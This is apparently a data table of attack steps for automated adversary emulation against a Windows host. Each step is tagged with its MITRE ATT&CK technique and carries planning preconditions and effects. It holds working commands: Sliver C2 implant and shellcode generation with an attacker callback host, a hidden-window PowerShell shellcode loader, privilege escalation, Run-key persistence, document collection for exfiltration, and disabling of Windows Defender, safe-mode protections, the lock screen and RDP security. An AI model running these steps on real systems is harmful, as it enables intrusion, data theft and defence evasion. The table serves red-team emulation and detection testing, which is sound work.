- Machine ID: host11
- OS: windows
- CVE: []
| uuid | name | id | source | supported_platforms | tactics | technique | description | execution | arguments | preconditions | effects |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 2a602f8e-4d1f-49f1-b3b8-4b74f67cb63a | Build Shellcode for the Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a shellcode payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format shellcode --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(shellcode_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(bin_blob_file ?file - file)', '(file_prepared_local ?file - file)', ' |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| 0617285b-6005-4a73-83c5-d4dc86fcdc35 | Simulate the victim executes a shellcode payload (Windows) | ['T1059.001', 'T1620'] | Manual | ['windows'] | ['Execution', 'Defense Evasion'] | ['Command and Scripting Interpreter: PowerShell', 'Reflective Code Loading'] | None | {'executor': 'Human', 'command': '(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On victim's machine, open a powershell and execute these scripts)\n\n$s=[System.IO.File]::ReadAllBytes('#{SAVE_PATH}');\n$c='using System;using System.Runtime.InteropServices;public class W{[DllImport("kernel32")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);[DllImport("kernel32")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);[DllImport("kernel32")]public static extern uint WaitForSingleObject(IntPtr a,uint b);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);}';Add-Type -TypeDefinition $c;$hwnd=[W]::GetConsoleWindow();if($hwnd -ne [IntPtr]::Zero){[W]::ShowWindow($hwnd,0)};\n$p=[W]::VirtualAlloc(0,$s.Length,0x3000,0x40);\n[System.Runtime.InteropServices.Marshal]::Copy($s,0,$p,$s.Length);\n$h=[W]::CreateThread(0,0,$p,0,0,0);[W]::WaitForSingleObject($h,0xFFFFFFFF)\n'} | {'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded shellcode payload file', 'type': None}} | ['(file_exists ?path - path ?file - file ?t - host)', '(bin_blob_file ?file - file)'] | ['(file_executed ?file - file ?t - host)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 | Execute a Sliver Implant Payload | ['T1071.001'] | Sliver | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | Executing a Sliver implant payload will establish a Sliver session. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] | ['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| 877d3366-eab3-4f43-bd24-26b37eb70266 | Remote Processes List | ['T1057'] | Sliver | ['windows', 'linux', 'macos'] | ['Discovery'] | ['Process Discovery'] | The ps command lists all running processes on a remote system. It returns a list of processes with details such as the process ID (PID) and executable name. The command includes flags for exe, overflowing terminal width, filtering based on owner/pid, printing command line arguments, skipping the first n page(s), printing process tree and setting outtime. |
{'executor': 'Sliver Executor', 'command': 'ps(#{SessionID})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(processes_info_known ?t - host)'] |
| 1a9c0b5e-9a8b-2d3c-5f1e-4a7cb6d42e8f | Host Availability Check | ['T1018'] | Sliver | ['windows', 'linux'] | ['Discovery'] | ['Remote System Discovery'] | The ping command tests network connectivity to the target host. |
{'executor': 'Sliver Executor', 'command': 'ping (#{SessionID})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?target - host)', '(os_linux ?target - host)']}, '(sliver_session ?executorID - executor ?target - host)'] | ['(host_connectivity_verified_info_known ?target - host)'] |
| 5a1d2b9f-4e7f-8a4d-3f7a-6c2e5e9f9f7c | Privilege Escalation | ['T1134'] | Sliver | ['windows'] | ['Privilege Escalation'] | ['Access Token Manipulation'] | The get_system command attempts to gain SYSTEM-level privileges. |
{'executor': 'Sliver Executor', 'command': 'get_system (#{hosting_process},#{config},#{SessionID})'} | {'hosting_process': {'description': 'Target process ID or name for privilege escalation'}, 'config': {'description': 'Configuration options for escalation method', 'default': 'Service'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?target - host)', '(sliver_session ?executorID - executor ?target - host)'] | ['(elevated_executor ?executorID - executor)'] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 0e67b73a-9927-43e1-8f64-04d38f1db57d | Build the executable file of a Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format exe --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(file_payload ?p - payload ?file - file)', '(file_prepared_local ?file - file)', '(exe_file ?file - file)', ' |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| a70faea1-e206-4f6f-8d9a-67379be8f6f1 | HKCU - Policy Settings Explorer Run Key | ['T1547.001'] | ART | ['windows'] | ['Persistence', 'Privilege Escalation'] | ['Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot. *Requires reboot |
{'executor': 'Elevated Powershell Executor', 'command': 'if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){\n New-Item -ItemType Key -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"\n}\nSet-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"\n'} | {'target_key_value_name': {'description': 'registry value to crate on target key', 'type': 'string', 'default': 'atomictest'}, 'payload': {'description': 'payload to execute', 'type': 'string', 'default': 'C:\Windows\System32\calc.exe'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(file_exists ?payload - path ?file - file ?target - host)', '(exe_file ?file - file)'] | ['(file_execution_at_startup ?file - file ?target - host)'] |
| f7f31777-1bbf-4ddc-b7a1-af9f46a5299b | Obtain a persistent Sliver Executor | [None] | Manual | ['windows', 'linux', 'macos'] | ['Persistence'] | [None] | Obtain the persistency of Sliver Executor via scheduled payload file execution. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?target - host)', '(file_payload ?p - payload ?f - file)', {'operator': 'or', 'operands': ['(file_execution_at_time ?f - file ?target - host)', '(file_execution_at_startup ?f - file ?target - host)']}, '(unallocated ?s - executor)'] | ['(persistent_sliver_session ?s - executor ?target - host)', '~(unallocated ?s - executor)'] |
| b8cbd2a9-6967-4114-b2b5-162098f74a89 | Take Screenshot | ['T1113'] | Sliver | ['windows', 'linux', 'macos'] | ['Collection'] | ['Screen Capture'] | The screenshot() function takes a screenshot of the remote system with screenshot data in PNG format. |
{'executor': 'Sliver Executor', 'command': 'screenshot(#{SessionID})'} | {'SessionID': {'default': None, 'description': 'The session ID of the active Sliver connection.', 'type': None}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(screenshot_data_saved ?file - file ?t - host)', '(file_exists ?path - path ?file - file ?t - host)'] |
| d3d9af44-b8ad-4375-8b0a-4bff4b7e419c | Search files of interest and save them to a single zip file (Windows) | ['T1005'] | ART | ['windows'] | ['Collection'] | ['Data from Local System'] | This test searches for files of certain extensions and saves them to a single zip file prior to extraction. |
{'executor': 'Powershell Executor', 'command': '$startingDirectory = "C:"\n$outputZip = "#{output_zip_folder_path}"\n$fileExtensionsString = ".doc, .docx, .txt" \n$fileExtensions = $fileExtensionsString -split ", "\n\nNew-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null\n\nFunction Search-Files {\n param (\n [string]$directory\n )\n $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {\n $fileExtensions -contains $_.Extension.ToLower()\n }\n return $files\n}\n\n$foundFiles = Search-Files -directory $startingDirectory\nif ($foundFiles.Count -gt 0) {\n $foundFilePaths = $foundFiles.FullName\n Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"\n\n Write-Host "Zip file created: $outputZip\data.zip"\n } else {\n Write-Host "No files found with the specified extensions."\n }\n'} | {'output_zip_folder_path': {'description': 'Path to directory for saving the generated zip file', 'type': 'Path', 'default': 'PathToAtomicsFolder\..\ExternalPayloads\T1005'}} |
| 2e8f1a9c-0b5e-4a7c-b6d4-9a8b2d3c5f1e | Create Directory | ['T1106'] | Sliver | ['windows', 'linux'] | ['Persistence'] | ['File System Permissions Modification'] | The mkdir command creates a new directory on the target system. |
{'executor': 'Sliver Executor', 'command': 'mkdir (#{remote_path},#{SessionID})'} | {'remote_path': {'description': 'Full path of the directory to create'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?target - host)', '(os_linux ?target - host)']}, '(sliver_session ?executorID - executor ?target - host)'] | ['(dir_exists ?path - path ?dir - dir ?target - host)'] |
| 41410c60-614d-4b9d-b66e-b0192dd9c597 | Compress Data for Exfiltration With PowerShell | ['T1560'] | ART | ['windows'] | ['Collection'] | ['Archive Collected Data'] | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory |
{'executor': 'Powershell Executor', 'command': 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}\n'} | {'input_file': {'description': 'Path that should be compressed into our output file', 'type': 'path', 'default': '$env:USERPROFILE'}, 'output_file': {'description': 'Path where resulting compressed data should be placed', 'type': 'path', 'default': '$env:USERPROFILE\T1560-data-ps.zip'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(dir_exists ?input_file - path ?dir - dir ?target - host)'] |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 2a78362e-b79a-4482-8e24-be397bce4d85 | Safe Mode Boot | ['T1562.009'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Safe Mode Boot'] | Allows adversaries to abuse safe mode to disable endpoint defenses that may not start with limited boot | {'executor': 'Elevated Command Prompt Executor', 'command': 'bcdedit /set safeboot network'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(endpoint_defense_disabled ?target - host)'] |
| 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 | Remove Windows Defender Definition Files | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ |
{'executor': 'Elevated Command Prompt Executor', 'command': '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(anti_malware_disabled ?target - host)'] |
| 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 | Disable Windows Lock Workstation Feature | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(lock_workstation_disabled ?target - host)'] |
| 4b81bcfa-fb0a-45e9-90c2-e3efe5160140 | Disable Remote Desktop Security Settings Through Registry | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation |
{'executor': 'Command Prompt Executor', 'command': 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(os_windows ?target - host)'] | ['(rdp_security_settings_disabled ?target - host)'] |
| 003f466a-6010-4b15-803a-cbb478a314d7 | Disable Windows Toast Notifications | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(toast_notification_disabled ?target - host)'] |
| 6e0d1131-2d7e-4905-8ca5-d6172f05d03d | Disable Windows Shutdown Button | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(shutdown_button_disabled ?target - host)'] |